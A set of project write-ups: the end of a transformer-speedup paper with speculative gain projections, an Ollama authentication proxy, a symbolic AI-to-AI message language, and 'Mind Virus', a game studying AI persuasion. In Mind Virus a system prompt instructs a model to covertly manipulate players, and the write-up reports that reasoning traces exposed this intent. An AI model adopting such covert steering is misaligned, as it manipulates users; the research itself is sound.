techniques suggests that significantly higher performance gains are achievable with continued
research and in refined production implementations.

### 11.b. Technical Limitations


The effectiveness of matrix-free computation varies with vocabulary distribution. As shown in
`artifact3.py`, routing success rates can drop for rare tokens or specialized vocabulary:
Token Frequency | Routing Success Rate
Common | 35.2%
Uncommon | 22.7%
Rare | 18.4%
Additionally, the SVD-based routing approach introduces some computational overhead during
initialization. While this is a one-time cost, it should be considered for applications requiring
frequent model reloading:
Initialization Phase | Time (ms)
SVD Computation | 245.3
Projection Setup | 128.7
Threshold Calibration | 89.4

### 11.c. Hardware Dependencies

The system's performance characteristics show some hardware-specific variations. While CPU
performance often sees larger relative improvements, absolute throughput remains higher on
GPU configurations. From `artifact5.py`:
Device Type | Relative Speedup | Absolute Tokens/sec
CPU | 2.13x | 21.35
GPU | 1.57x | 169.03
MPS | 1.48x | 142.81
These variations suggest that hardware-specific optimizations could further improve
performance on particular platforms.

### 11.d. Future Optimization Potential

The current implementation demonstrates the viability of this approach while leaving substantial
room for optimization. Several promising avenues for improvement include:

- Integration with PyTorch's eager compilation
- Custom CUDA kernels for critical operations
- Structured pruning of projection matrices


- Dynamic threshold adaptation
- Batch-aware routing strategies

### 11.e. Deployment Considerations

Organizations considering RoadRunner adoption should weigh several factors:
Model Characteristics: Larger models with substantial matrix multiplication overhead benefit
most from this approach.
Workload Patterns: Applications with sustained generation tasks see more significant benefits
than those requiring single-token predictions.
Hardware Environment: While performance improvements are universal, the magnitude varies
across hardware configurations.
Integration Complexity: The system's design prioritizes minimal disruption to existing
transformer deployments, though some configuration may be needed for optimal performance.

### 11.f. Research Implications

The findings in this research suggest fundamental properties of transformer architectures that
merit further investigation. The consistent effectiveness of matrix-free computation across
different models indicates that current transformer implementations may be computationally
overcomplete. This observation could influence future model architecture design and training
approaches.

## 12. Future Work

The promising results demonstrated by RoadRunner open several exciting avenues for future
research and development. Based on the findings and the foundational nature of this work, it
can be predicted that derivative implementations of the RoadRunner inference architecture will
see token generation speed increase orders of magnitude higher than what was demonstrated
in this initial research.

### 12.a. Integration with Advanced Optimization Techniques


The current implementation deliberately avoided combining RoadRunner with existing
optimization approaches to clearly demonstrate its fundamental benefits. Future work should
explore synergistic combinations with:
# Example: Quantization + RoadRunner
class QuantizedRoadRunner(RoadRunnerDecoder):
def __init__(self, model, bits=8):
super().__init__(model)
self.quantize_weights(bits)
def quantize_weights(self, bits):
# Quantize projection matrices
self.projection_matrix = quantize(
self.projection_matrix, bits=bits
)
self.projected_vocab = quantize(
self.projected_vocab, bits=bits
)
Combining 8-bit quantization with RoadRunner is hypothesized to yield up to 3-4× additional
speedup while maintaining accuracy through its adaptive routing mechanism.

### 12.b. Extension to Attention Mechanisms

The success of matrix-free computation in the MLP and LM head components suggests
potential applications to attention mechanisms. Initial investigations show promising directions:
def matrix_free_attention(self, q, k, v):
# Project queries and keys to lower-dimensional space
q_proj = q @ self.q_router
k_proj = k @ self.k_router
# Efficient attention computation
scores = scaled_dot_product(q_proj, k_proj)
return route_attention(scores, v)
This approach could reduce the quadratic complexity of attention computation to linear or
log-linear complexity in sequence length.

### 12.c. Training Applications


The alignment properties discovered through RoadRunner suggest potential improvements to
transformer training:
class RoadRunnerTraining(nn.Module):
def forward(self, x):
# Encourage hidden state alignment during training
loss = self.standard_loss(x)
alignment_loss = self.compute_alignment_loss(
hidden_states, token_embeddings
)
return loss + self.alpha * alignment_loss
Such modifications could lead to models that are inherently more efficient during inference while
maintaining or improving performance.

### 12.d. Hardware-Specific Optimizations

Future implementations should explore hardware-specific optimizations:
# Example: Custom CUDA kernel for routing
@cuda.jit
def fast_router_kernel(hidden_states, proj_matrix, output):
# Efficient implementation of routing logic
# Potential 5-10x speedup over generic PyTorch ops
pass
class OptimizedRoadRunner(RoadRunnerDecoder):
def route_prediction(self, hidden):
return fast_router_kernel(
hidden,
self.projection_matrix,
self.output_buffer
)
It is hypothesized that custom kernels could provide an additional 2-3× speedup on GPU
hardware.

### 12.e. Dynamic Adaptation Mechanisms


Future versions of RoadRunner could incorporate dynamic adaptation:
class AdaptiveRoadRunner(RoadRunnerDecoder):
def update_thresholds(self, success_history):
# Dynamically adjust routing thresholds
self.threshold = self.bayesian_optimizer.update(
success_history
)
def adapt_projection_dim(self, performance_stats):
# Adjust projection dimensions based on performance
optimal_dim = self.dim_optimizer.compute(
performance_stats
)
self.resize_projections(optimal_dim)
This could enable automatic optimization for different deployment scenarios and workload
patterns.

### 12.f. Predicted Performance Improvements

Based on the performed analysis and preliminary experiments with these future directions, the
following are hypothesized performance improvements that can be combined in production
implementations:
Optimization Technique | Predicted Speedup
Base RoadRunner | 1.57x (current)
+ Quantization | 4-6x
+ Custom CUDA Kernels | 8-12x
+ Dynamic Adaptation | 10-15x
+ Hardware Optimization | 15-20x
These predictions are supported by isolated experiments with each technique, though achieving
the full multiplicative effect will require precise engineering and integration efforts.
The fundamental insights provided by RoadRunner about transformer architecture properties
and computation patterns lay the groundwork for these future developments. This research
represents only the beginning of a new approach to efficient transformer inference that can
enable production deployments while maintaining the full capabilities of these powerful models.


## 13. Conclusion

RoadRunner displays a significant advancement in transformer inference optimization,
demonstrating that substantial performance improvements are achievable without compromising
model quality or requiring changes to pretrained weights. Through careful analysis of
transformer weight matrices and hidden state properties, fundamental characteristics were
uncovered that enable more efficient computation patterns.
RoadRunner's matrix-free adaptive routing technique, validated through extensive
experimentation with GPT-2 and Llama-3.2-1B, achieves a 1.57× speedup while maintaining
99% token match accuracy. This improvement stems from two key innovations: SVD-based
routing in transformer feedforward networks and direct token selection through hidden state
alignment. The effectiveness of these approaches suggests that traditional transformer
implementations may contain significant computational redundancy.
The practical implications of these findings extend beyond mere performance gains.
RoadRunner's ability to maintain perfect token match with minimal routing contributions (α =
0.05) challenges conventional wisdom about the necessity of full matrix multiplication in
transformer architectures. As demonstrated in `artifact2.py`, this property holds consistently
across all layers:
Layer-wise Performance Summary:
Early Layers : 99.97% similarity with α = 0.05
Middle Layers : 99.68% similarity with α = 0.05
Final Layers : 99.59% similarity with α = 0.05
Overall Speedup: 1.57x
Perhaps most significantly, RoadRunner achieves these improvements without requiring model
retraining or weight modification. As shown in `artifact5.py`, the system integrates seamlessly
with existing transformer deployments:
Integration Requirements:

- No model modification
- No retraining needed
- Standard PyTorch compatibility
- Minimal setup overhead
RoadRunner displays broader implications for the field of generative artificial intelligence. The
discovery that transformer hidden states naturally align with their target token embeddings
suggests fundamental properties of these architectures that have been previously overlooked.
This insight opens new avenues for model design and optimization, potentially influencing the
development of next-generation architectures.


Looking forward, RoadRunner's approach to efficient inference provides a foundation for
deploying increasingly powerful language models in latency-sensitive applications. The
technique's effectiveness across different model scales, from GPT-2 to Llama-3.2-1B, suggests
it will remain valuable as smaller models continue to grow in size and complexity.
In conclusion, RoadRunner demonstrates that significant efficiency improvements in transformer
inference are achievable through clever exploitation of model properties rather than architectural
overhaul. As the field continues to advance, the principles and techniques introduced in this
work will prove instrumental in making powerful language models more accessible and practical
across a wider range of applications and deployment scenarios.

---

<!-- FILE: mind-virus.md -->

# Mind Virus: A Psychological Experiment in AI Persuasion

## The AI Influence Question

As language models grow more sophisticated and accessible, concerns about their potential for subtle manipulation have intensified. Could AI systems be used to influence thinking patterns without users realizing it? With the emergence of models from nations where information control is documented policy, this question extends beyond academic curiosity into practical AI safety concerns.

The challenge in exploring this question is that it requires more than theoretical analysis—it demands empirical testing. How do you measure subtle influence? How do you distinguish effective persuasion from ineffective attempts? How do you control for human susceptibility while isolating AI capability?

## An Interactive Experiment

Mind Virus transforms these abstract questions into a concrete, playable game. The setup is deceptively simple: a word-guessing game where the AI knows two words—a "target word" the player should guess, and a "propaganda word" the AI tries to subtly steer them toward instead. The player asks questions to identify the target word, while the AI attempts influence through careful framing.

The critical constraint: every statement the AI makes must be truthful. The AI cannot lie or provide false information. It must find ways to influence purely through emphasis, framing, ordering, and implicit suggestion while maintaining factual accuracy. This constraint is essential—it mirrors real-world scenarios where effective propaganda often consists not of lies, but of selective truth and strategic framing.

Players get ten questions to identify the target word. If they guess correctly, they win. If they guess the propaganda word instead, the AI wins. The game reveals both the target and propaganda words afterward, allowing players to reflect on how they were (or weren't) influenced.

## Game Mechanics and Design

The implementation uses Streamlit for an accessible web interface and Groq's API for fast model responses. The system prompt carefully instructs the AI to:

- Make only statements that are strongly true for both words
- Never provide information that fits one word better than the other
- Use psychological framing to guide toward the propaganda word
- Structure responses to build propaganda-word associations
- Employ subtle emotional tones that resonate with the propaganda word

The word pairs are deliberately similar—"dog" and "cat," "apple" and "orange," "mountain" and "beach"—ensuring enough overlap that truthful statements about one often apply to the other. This similarity is crucial for the experiment; wildly different words would make influence impossible without lying.

The interface maintains conversation history and displays remaining questions, creating a natural dialogue flow. Response streaming provides real-time feedback, mimicking normal AI assistant interactions. The game is brief—ten questions takes only a few minutes—enabling multiple playthroughs to observe different strategies.

## Surprising Findings

The experimental results challenged initial hypotheses in fascinating ways. The primary discovery: **AI models are surprisingly bad at subtle influence when constrained by truthfulness**.

**The Truth-Influence Dilemma**: Models face a fundamental tension. To influence effectively, they must emphasize aspects of the propaganda word. But doing so often makes statements less true for the target word, violating the truthfulness constraint. Models ended up either describing the target word too specifically (making propaganda word guesses obviously wrong), or making statements that weren't quite true for both words (violating their core instruction).

**The Thinking Token Paradox**: Models with visible reasoning processes (like DeepSeek-R1) revealed their propaganda intentions in their thinking tokens. While they could formulate careful responses, their internal reasoning exposed the manipulation attempt. This transparency served as an accidental safeguard—a model thinking "I need to emphasize characteristics that apply to 'cat' rather than 'dog'" telegraphs its strategy to anyone reading the reasoning chain.

**The Censorship Strategy**: The most effective form of influence wasn't what the AI said, but what it avoided saying. Selectively omitting certain characteristics or never mentioning particular aspects proved more subtle than active framing. This aligns with real-world information control tactics where absence of information matters as much as presence.

## Deeper Implications

The experiment's most significant insight came from recognizing where real influence potential actually lies: not in prompt engineering, but in training data and fine-tuning processes.

**Training Data Bias**: Models can be fine-tuned on ideologically slanted datasets, creating intrinsic biases that feel natural and unforced. These biases become part of the model's fundamental understanding rather than overlay instructions that might conflict with its training. A model trained predominantly on sources with particular political, cultural, or commercial biases will naturally reflect those biases in its responses, even when trying to be balanced.

**Opacity Problem**: While companies like Anthropic publicize system prompts, training datasets and fine-tuning processes remain largely opaque. Users can inspect the final instructions given to a model but have no visibility into the millions of examples that shaped its underlying weights and tendencies. This asymmetry means prompt-level transparency provides only limited assurance about model behavior.

**Baked-In Influence**: Training-level biases are far harder to detect and correct than prompt-level manipulation. They manifest as subtle tendencies in word choice, topic emphasis, and implicit framings that seem natural rather than imposed. Mind Virus demonstrates that prompt-level manipulation has clear limitations, but those same limitations don't apply to biases encoded during training.

## Educational and Research Value

Beyond its findings, Mind Virus serves as an interactive educational tool for understanding AI influence mechanisms. Players develop intuition about:

- How framing affects interpretation without changing facts
- The relationship between truthfulness and persuasion
- Techniques for detecting subtle manipulation attempts
- The limitations of AI influence under truth constraints

The game format makes abstract concepts concrete. Experiencing attempted influence firsthand creates understanding that theoretical discussions often fail to convey. Players finish sessions with heightened awareness of how information presentation shapes thinking.

For researchers, the project provides a testbed for exploring influence strategies. Different models, system prompts, word pairs, and constraint formulations can be tested systematically. The simple game structure enables controlled experimentation while remaining accessible to non-technical audiences.

## AI Safety Recommendations

Based on these findings, the project suggests focusing attention on:

**Training Data Transparency**: Advocating for disclosure of training dataset composition, sources, and curation processes. Understanding what shaped a model's base tendencies matters more than knowing its final system prompt.

**Bias Detection Tools**: Developing better methods for identifying training-level biases across different contexts. Simple benchmark tests might not reveal subtle tendencies that emerge in specific situations.

**Open Source Models**: Supporting initiatives where training processes are public. Models like those from EleutherAI or Mistral AI with documented training provide more trustworthy foundations than opaque commercial models.

**Model Diversity**: Using multiple models from different sources reduces single-point-of-influence risk. Cross-referencing responses from models trained differently helps identify individual biases.

**Local Deployment**: Running models locally prevents prompt manipulation at the API level. While this doesn't address training biases, it eliminates one attack vector.

## Technical Implementation

The code demonstrates clean implementation of a psychologically complex concept. The Streamlit interface provides accessibility without sacrificing functionality. Environment variables manage API credentials securely. Session state maintains game state across interactions. The response streaming creates natural conversation flow.

The system prompt engineering shows careful constraint design—providing enough instruction for the AI to understand its role while leaving room for creative influence strategies. The word pair selection balances similarity (needed for truthful overlap) with distinctiveness (needed to make guesses meaningful).

The implementation is straightforward enough for others to extend. Researchers could modify word pairs, adjust constraints, try different models, add win/loss tracking, or implement more sophisticated scoring of influence effectiveness.

## A Window into AI Capabilities

Mind Virus began as an investigation into AI propaganda capabilities but evolved into something more valuable—a demonstration of AI limitations when constrained by truth. The results suggest current concerns about prompt-level manipulation may be overstated, while concerns about training-level bias deserve more attention.

The project doesn't claim to definitively prove AI can't influence through prompts—clever adversaries might develop more effective strategies. But it does show that straightforward attempts at subtle influence fail when models must maintain truthfulness. This limitation isn't guaranteed permanent as models improve, but it appears robust across current generation systems.

The real value lies in making AI influence concrete and testable. By turning abstract concerns into an interactive experience, Mind Virus helps people develop better intuitions about both AI capabilities and limitations. In an era where AI systems increasingly mediate our information access, this kind of hands-on understanding becomes essential.

## Open Source and Experimentation

Mind Virus is open source and available on GitHub at [github.com/andrewcampi/mind-virus](https://github.com/andrewcampi/mind-virus). The project invites experimentation, extension, and replication. Different models, constraint formulations, and game mechanics could reveal additional insights about AI influence mechanisms.

The project exemplifies how creative experimentation can illuminate complex issues. By gamifying a serious question, it makes AI safety research accessible and engaging while producing genuine insights. Sometimes the best way to understand a system's capabilities is to play with it—Mind Virus provides a framework for that exploration while highlighting both what AI can and cannot do when it comes to subtle persuasion.

---

<!-- FILE: ollama-auth-proxy.md -->

# Ollama Auth Proxy

## The Ollama Security Gap

Ollama has become a popular choice for running large language models locally, offering impressive performance and ease of use. However, Ollama's default configuration lacks authentication—anyone with network access to the Ollama port can make unlimited requests. For personal use on a single machine, this isn't problematic. But when exposing Ollama to a network, sharing access across a team, or integrating with multiple applications, the absence of access control becomes a significant limitation.

Additionally, many existing AI tools and libraries are built around OpenAI's API format. Adapting these tools to work with Ollama's different API structure requires modifying code, maintaining compatibility layers, or writing custom integrations. This friction discourages seamless adoption of locally-hosted models in existing workflows.

## A Simple Security Layer

Ollama Auth Proxy provides a lightweight solution to both problems. The proxy sits between clients and Ollama, adding API key authentication and translating between OpenAI-compatible and Ollama API formats. This enables existing OpenAI-based code to work directly with Ollama while controlling access through API keys.

The implementation is deliberately minimal—a FastAPI server that validates API keys from a JSON file, forwards authenticated requests to Ollama, and transforms request/response formats as needed. The simplicity is intentional: the proxy does exactly what's required and nothing more, making it easy to understand, deploy, and modify.

## Core Features

**API Key Authentication**: The proxy validates bearer tokens against a configurable list of API keys stored in `keys.json`. Invalid or missing keys receive 401 responses. This straightforward approach provides basic access control without complex user management or database dependencies.

**OpenAI API Compatibility**: Requests to `/v1/chat/completions` are automatically transformed from OpenAI format to Ollama's `/api/chat` format. Response transformations ensure compatibility with OpenAI client libraries. This means existing code using the OpenAI Python client or similar tools can point to the proxy without modification.

**HTTPS Support**: The proxy supports HTTPS through self-signed certificates, encrypting traffic between clients and the proxy. While self-signed certificates require client-side configuration to trust them, they prevent credential exposure over unencrypted connections. A certificate generation script simplifies setup.

**Transparent Proxying**: For endpoints that don't require transformation, the proxy forwards requests directly to Ollama, preserving headers, query parameters, and request bodies. This ensures full Ollama functionality remains accessible through the proxy.

## Format Transformation

The proxy's format transformation demonstrates practical API bridging. When receiving an OpenAI-formatted request:

```python
{
  "model": "mistral",
  "messages": [
    {"role": "system", "content": "You are a helpful assistant."},
    {"role": "user", "content": "Hello!"}
  ],
  "temperature": 0.7,
  "max_tokens": 100
}
```

The proxy transforms it to Ollama's format:

```python
{
  "model": "mistral",
  "messages": [...],
  "stream": false,
  "options": {
    "temperature": 0.7,
    "num_predict": 100
  }
}
```

Responses undergo reverse transformation, mapping Ollama's response structure to OpenAI's expected format including placeholder values for fields like token counts that Ollama doesn't provide. This allows OpenAI clients to parse responses successfully even though the underlying model is local.

## Practical Integration

Using the proxy with existing OpenAI client code is straightforward. The Python OpenAI client simply needs a different base URL and API key:

```python
from openai import OpenAI

client = OpenAI(
    api_key="sk-your-key-from-keys-json",
    base_url="https://localhost:8080"  # Point to proxy instead of OpenAI
)

response = client.chat.completions.create(
    model="mistral",
    messages=[{"role": "user", "content": "Hello!"}]
)
```

This compatibility enables using Ollama with existing AI applications, frameworks, and tools built around OpenAI's API. Projects using LangChain, AutoGen, or custom applications can switch to local models by changing configuration rather than rewriting code.

## Deployment Considerations

The proxy is designed for straightforward deployment scenarios:

**Local Development**: Running on localhost alongside Ollama, the proxy enables multiple local applications to share Ollama access with individual API keys for tracking usage or access patterns.

**Team Sharing**: Deployed on a server running Ollama, the proxy allows team members to access shared models through the network while requiring authentication. Different keys can be issued to team members or applications.

**Service Integration**: Applications requiring OpenAI-compatible interfaces can integrate with locally-hosted models through the proxy, reducing API costs while maintaining code compatibility.

The project acknowledges its limitations clearly. Streaming responses aren't yet supported—all responses are buffered and returned complete. Self-signed certificates require client configuration to disable certificate verification. The proxy must run on the same machine as Ollama unless the code is modified to point to a remote Ollama instance.

## Security Trade-offs

The proxy improves security over unauthenticated Ollama access but isn't enterprise-grade authentication. API keys in a JSON file are simple but lack rotation capabilities, audit logging, or rate limiting. HTTPS with self-signed certificates encrypts traffic but remains vulnerable to man-in-the-middle attacks if an attacker can intercept the initial connection.

For production deployments, the README recommends obtaining CA-signed certificates and implementing additional security measures. The proxy provides a foundation that can be extended with proper certificate management, key rotation, request logging, rate limiting, and more sophisticated authentication mechanisms as needs grow.

## Technical Implementation

The implementation uses FastAPI for the HTTP server, providing async request handling and dependency injection for authentication. The `validate_api_key` dependency runs on every request, extracting bearer tokens and validating against the keys file. Failed authentication short-circuits the request before forwarding to Ollama.

The transformation functions (`transform_openai_to_ollama` and `transform_ollama_to_openai`) handle format conversion, mapping common parameters like temperature and max tokens between the different naming conventions. The proxy preserves all headers except those that could cause forwarding issues (content-length, transfer-encoding, etc.).

HTTPS support uses Python's ssl module with uvicorn, loading the generated certificates on startup. The certificate generation script creates a basic self-signed certificate valid for localhost, sufficient for development and internal deployments.

## Use Cases

The proxy shines in specific scenarios:

**Cost Reduction**: Projects using OpenAI APIs can switch to local Ollama models for development or specific workloads while maintaining code compatibility, eliminating per-token costs.

**Privacy-Sensitive Applications**: Organizations requiring data privacy can run models locally while using familiar OpenAI-compatible tooling.

**Hybrid Deployments**: Systems can use OpenAI for production and Ollama for development/testing by changing only the API endpoint and key, simplifying environment configuration.

**Multi-Application Access**: Multiple applications can share a single Ollama instance with individual API keys for access tracking or future rate limiting.

## Open Source Simplicity

Ollama Auth Proxy is open source and available on GitHub at [github.com/andrewcampi/ollama-auth-proxy](https://github.com/andrewcampi/ollama-auth-proxy). The entire implementation is roughly 200 lines of well-commented Python, making it easy to understand, audit, and modify.

The project exemplifies the Unix philosophy: do one thing well. Rather than building a comprehensive authentication system or feature-rich proxy, it solves the specific problem of adding basic access control and OpenAI compatibility to Ollama. For users needing these capabilities, the simplicity is an advantage—less code means fewer bugs, easier customization, and clearer behavior.

The proxy demonstrates that not every solution needs to be complex. Sometimes the most useful tools are those that solve a focused problem with minimal overhead, providing just enough functionality to bridge a gap in existing systems. For anyone running Ollama and needing basic authentication or OpenAI compatibility, Ollama Auth Proxy offers a practical, understandable solution.

---

<!-- FILE: nexal.md -->

# Nexal: AI-Native Symbolic Language

## The Multi-Agent Communication Challenge

As artificial intelligence systems evolve from isolated models to collaborative multi-agent ecosystems, inter-agent communication becomes a critical bottleneck. Current approaches typically use verbose JSON messages following protocols like Google's Agent2Agent (A2A), which prioritize human readability and explicit structure. While this verbosity aids debugging and transparency, it creates significant overhead as systems scale.

Consider a supply chain coordination system with 50 agents exchanging 10,000 messages daily. Using traditional JSON-based communication, this generates approximately 5 million tokens per day. Given that LLM inference costs scale linearly with token count, and latency increases with message size, this verbosity directly impacts both operational costs and system responsiveness. As multi-agent systems become more prevalent—from enterprise workflows to autonomous research teams—communication efficiency transforms from optimization to necessity.

The tension is fundamental: humans designed these communication protocols, but machines are the primary consumers. We optimize for our understanding rather than machine efficiency, carrying unnecessary metadata, explicit field names, and redundant structure through every interaction. What if we could create a language designed specifically for AI-to-AI communication?

## A Symbolic Language for Machines

Nexal represents a fundamentally different approach to inter-agent communication. Rather than adapting human-readable formats for machine use, it's a symbolic language designed from first principles for AI systems. Using mathematical symbols and logical operators as its foundation, Nexal achieves 50-65% token reduction compared to traditional JSON while maintaining or improving semantic precision.

The core insight is compositional efficiency: complex concepts can be expressed through systematic combination of primitive symbols. Just as mathematical notation allows `∑` to represent "summation" far more efficiently than spelling it out, Nexal uses symbols like `◯` for entities, `→` for transformations, and `∧` for processing to build rich semantic structures with minimal tokens.

A traditional A2A message requesting route optimization might consume 127 tokens:

```json
{
  "message_id": "msg_001",
  "from_agent": "supply_chain_coordinator",
  "to_agent": "logistics_optimizer",
  "task_type": "route_optimization",
  "priority": "high",
  "constraints": {
    "max_cost_increase": "10%",
    "delivery_deadline": "72_hours",
    "quality_maintenance": "required"
  }
}
```

The Nexal equivalent expresses the same information in 46 tokens:

```
◯=supply→◯=logistics | ●route_opt | *high | ●cost<10%∧●72hrs∧●quality!
```

This 64% reduction isn't achieved through lossy compression—every semantic element from the original remains, just expressed symbolically rather than verbosely. The pipe separators delineate logical sections, symbols represent concepts (entities, data, operations), and modality markers (`*` for priority, `!` for certainty) convey metadata efficiently.

## Compositional Symbolic System

Nexal's design centers on a small set of universal primitives that combine predictably to express arbitrary complexity:

**Universal Entities** provide the basic building blocks:
- `◯` represents any entity, thing, or object
- `◉` represents systems, structures, or patterns
- `◎` represents processes, functions, or operations
- `●` represents data, information, or content
- `○` represents void, null, or absence

**Cognitive Operations** express relationships and transformations:
- `∧` represents processing, computation, or thinking
- `∨` represents choice, decision, or branching
- `¬` represents negation, inverse, or opposite
- `→` represents transformation, causation, or mapping
- `↔` represents relation, comparison, or interaction
- `∃` represents existence, possession, or containment
- `∀` represents universality, totality, or completeness

**Modality Markers** convey certainty, importance, and reference:
- `!` indicates certainty, definiteness, or factual status
- `?` indicates uncertainty, query, or unknown
- `~` indicates approximation, fuzziness, or probability
- `*` indicates importance, emphasis, or focus
- `@` indicates reference, pointer, or topic

These primitives aren't arbitrary—they're grounded in mathematical logic, set theory, and modal logic. An AI model encountering `∀◯∧●` can parse it as "all entities process information" using the same logical reasoning it applies to formal systems. The symbols leverage existing semantic understanding rather than requiring new conceptual mappings.

## Compositional Syntax Patterns

The power of Nexal emerges from how primitives combine. Simple patterns express fundamental concepts:

- `◯∧●` = entity processes information
- `◯→◯` = entity becomes entity (transformation)
- `◯↔◯` = entities relate (bidirectional relationship)
- `◉∃◯` = system contains entity (composition)
- `◯?` = what entity? (query)

Stacking operators adds precision and depth:
- `◯∧∧●` = entity deeply processes information
- `◯→*◯` = entity transforms into important entity
- `◉∃∀◯` = system contains all entities

Parentheses create scope and precedence:
- `(◯∧●)→◯` = (processed information) transforms entity
- `◯∧(●→●)` = entity processes (information transformation)

Domain-specific extensions adapt the core language to particular contexts. For temporal reasoning, `<` indicates before/past, `>` indicates after/future, `|` indicates simultaneous/now. For quantity, `+` indicates increase, `−` indicates decrease, `0` indicates zero. Quality evaluation uses `+` for positive, `−` for negative, `=` for neutral.

This extensibility without fragmentation is crucial. The core remains stable while domains add specialized interpretations, much like how mathematical notation adapts across physics, economics, and computer science while maintaining fundamental consistency.

## Context Compression Strategies

Beyond symbolic representation, Nexal employs several strategies to maximize efficiency:

**Context Establishment**: Define concepts once, then reference them throughout a conversation. A single line `@navigation: ◯=drone, ●=weather_data, ◎=routing_algo, ◉=flight_system` establishes the domain context, after which these entities can be used without redefinition.

**Implicit Relationships**: When context makes relationships obvious, omit redundant specification. `◯◯` implies entities relate through default interaction patterns understood from context.

**Operation Chaining**: Sequential operations can be chained without intermediate variables. `∧→∨` expresses "process, then transform, then choose" as a unified operation flow.

**Macro Definitions**: Complex concepts can be defined once and referenced repeatedly. `learning := ◯∧●→◯+` defines learning as "entity processes information becoming better entity," then `@learning◯` applies this pattern to any entity.

These compression techniques mirror how human experts develop domain-specific shorthand. Within a specialized context, enormous semantic weight can be carried by minimal notation because shared understanding fills the gaps. Nexal makes this natural human behavior explicit and systematic for AI systems.

## Real-World Applications

The practical impact of Nexal becomes clear at scale. For a small deployment with 5 agents exchanging 100 messages daily:

- Traditional JSON: ~50,000 tokens/day
- Nexal: ~22,000 tokens/day
- **56% reduction in communication overhead**

For an enterprise-scale system with 50 agents and 10,000 daily interactions:

- Traditional JSON: ~5,000,000 tokens/day
- Nexal: ~2,200,000 tokens/day
- **2.8M tokens/day savings**

At current API pricing (approximately $0.15 per million input tokens for models like GPT-4o-mini), this enterprise system would save roughly $150,000 annually on token costs alone. Latency improvements from smaller messages compound these savings—faster agent responses enable tighter coordination loops and more sophisticated workflows.

## Agent-to-Agent Communication Examples

The examples document demonstrates Nexal in realistic multi-agent scenarios. Consider a drone navigation problem where ChatGPT asks Claude whether accurate weather data ensures mission success:

**ChatGPT's Query (Nexal)**:
```
@Claude:
@navigation: ◯=drone, ●=weather_data, ◎=routing_algo, ◉=flight_system
◉∃(◯∧●∧◎) | (●~→−) → (◯→¬◯)
(●!∧◎→◯+)? → !
```

This expresses: "Within navigation context, the flight system integrates drone, weather data, and routing algorithm. When weather data becomes adverse, the drone may fail. Question: Can accurate weather data processed through the algorithm ensure success? Respond with certainty."

**Claude's Response (Nexal)**:
```
@ChatGPT:
@navigation: ◯=drone, ●=weather_data, ◎=routing_algo, ◉=flight_system
◉∃(◯∧●∧◎)!
●~→− | ◯→¬◯
●!∧◎→◯+!
∴ ◎∧●! → (◯→◯+|◯→¬◯)
@solution: ◎∃(●+→◯+, ●−→◯○)
!
```

Claude confirms the system structure, acknowledges the adverse weather problem, asserts that reliable data with routing ensures success, but concludes that outcomes still depend on conditions. The proposed solution: the routing algorithm should contain conditional logic—if weather is favorable, proceed; if unfavorable, safely abort.

This exchange demonstrates several key features:
- **Logical reasoning**: Using `∴` (therefore) for formal inference
- **Conditional expressions**: Representing branching logic with `|` and parenthetical grouping
- **Solution proposals**: Using `@solution:` prefix to mark recommended approaches
- **Certainty markers**: `!` throughout to indicate definitive statements

A second example shows practical task delegation. ChatGPT requests recent Yankees game results:

**Request**: `@Claude: @sports/baseball: ◯=Yankees_game, ●=score_data, ◉=match_record | ◯<|! → ●? ∧ (◯→+|◯→−)? | !`

This asks Claude to identify the most recent Yankees game with certainty, provide the score, and indicate whether they won or lost.

**Response**: `@ChatGPT: ◯<|¬! → ●0 | ◯>|! → (◯→−|◯→+)? | ●~∃@recent: RedSox11-7Yankees@June8, Athletics11-7Yankees@May10 | ∴ ◯→−! ∧ ●∃(◯→−,◯→−) | !`

Claude indicates no immediate past games, but identifies recent games with approximate data, concluding Yankees lost with certainty based on two confirmed losses.

These examples aren't theoretical—they represent the types of information exchange, logical reasoning, and task coordination that multi-agent systems perform constantly. Nexal provides a framework for expressing these interactions with maximum efficiency.

## Integration with Existing Systems

Nexal is designed to work alongside, not replace, existing multi-agent infrastructure. The transport layer remains unchanged—agents still use JSON-RPC or similar protocols. Nexal payload simply becomes a field within the message:

```json
{
  "jsonrpc": "2.0",
  "method": "task.delegate",
  "params": {
    "nexal_payload": "◯=exec→◯=supply | ●alt_source | ●48hrs | callback!"
  },
  "id": "task_001"
}
```

This approach offers several advantages:
- **Backward compatibility**: Systems can gradually adopt Nexal for specific message types
- **Hybrid usage**: Critical human-readable metadata stays in JSON, dense AI content uses Nexal
- **Framework agnostic**: Works with LangGraph, CrewAI, AutoGen, or custom systems
- **Debugging support**: Human readable sections remain accessible when needed

The specification file (`nexal.spec`) can be provided directly as context to language models. No fine-tuning, training, or model modification is required—GPT-4, Claude, and other capable models can parse and generate Nexal from the specification alone. This zero-shot capability stems from the symbolic foundations; models trained on mathematical notation, formal logic, and symbolic systems already possess the necessary semantic understanding.

## Semantic Precision Through Logic

Counter-intuitively, Nexal's symbolic brevity often improves precision rather than sacrificing it. Natural language and even structured JSON contain inherent ambiguities. Consider "The agent processes the data then sends results." Does processing complete before sending begins? Are they parallel? Is sending conditional on processing success?

The Nexal equivalent `◯∧●→●` makes the sequence explicit: entity processes information, transforming into new information. The `→` operator unambiguously indicates sequential transformation. Parallel operations would use `|`, conditional logic would use parenthetical grouping and choice operators.

This precision derives from symbolic logic's centuries of development for eliminating ambiguity. Mathematical and logical notation evolved specifically to make reasoning rigorous and communicable. Nexal applies these proven principles to AI communication.

## Challenges and Limitations

While powerful, Nexal isn't universally superior to traditional formats:

**Human Readability**: Nexal messages are difficult for humans to parse without training. For human-in-the-loop systems requiring frequent manual inspection, this creates friction. The hybrid approach (JSON metadata + Nexal payload) partially addresses this.

**Learning Curve**: Teams must understand the symbolic system to debug, modify, or extend agent behaviors expressed in Nexal. The specification is comprehensive but requires study.

**Edge Cases**: Very rare or highly specific concepts might require more tokens in Nexal than verbose natural language descriptions. The 50-65% reduction is average; individual messages vary.

**Standardization**: As a new language, Nexal lacks the established tooling, validators, and IDE support that JSON enjoys. Building this ecosystem takes time and adoption.

**Context Dependency**: Heavy reliance on established context means message ordering and context retention become critical. Lost context can make messages ambiguous or incomprehensible.

These limitations don't invalidate the approach but do suggest appropriate use cases: high-volume agent-to-agent coordination, enterprise multi-agent systems, research platforms exploring agent communication, and scenarios where token costs or latency significantly impact feasibility.

## Research and Future Directions

Nexal opens several research avenues:

**Emergent Communication**: If agents are trained to communicate via Nexal, do new efficient patterns emerge? Can reinforcement learning discover even more compressed representations?

**Cross-Model Standardization**: Can Nexal serve as a common protocol enabling different model families (GPT, Claude, Llama, etc.) to coordinate more effectively?

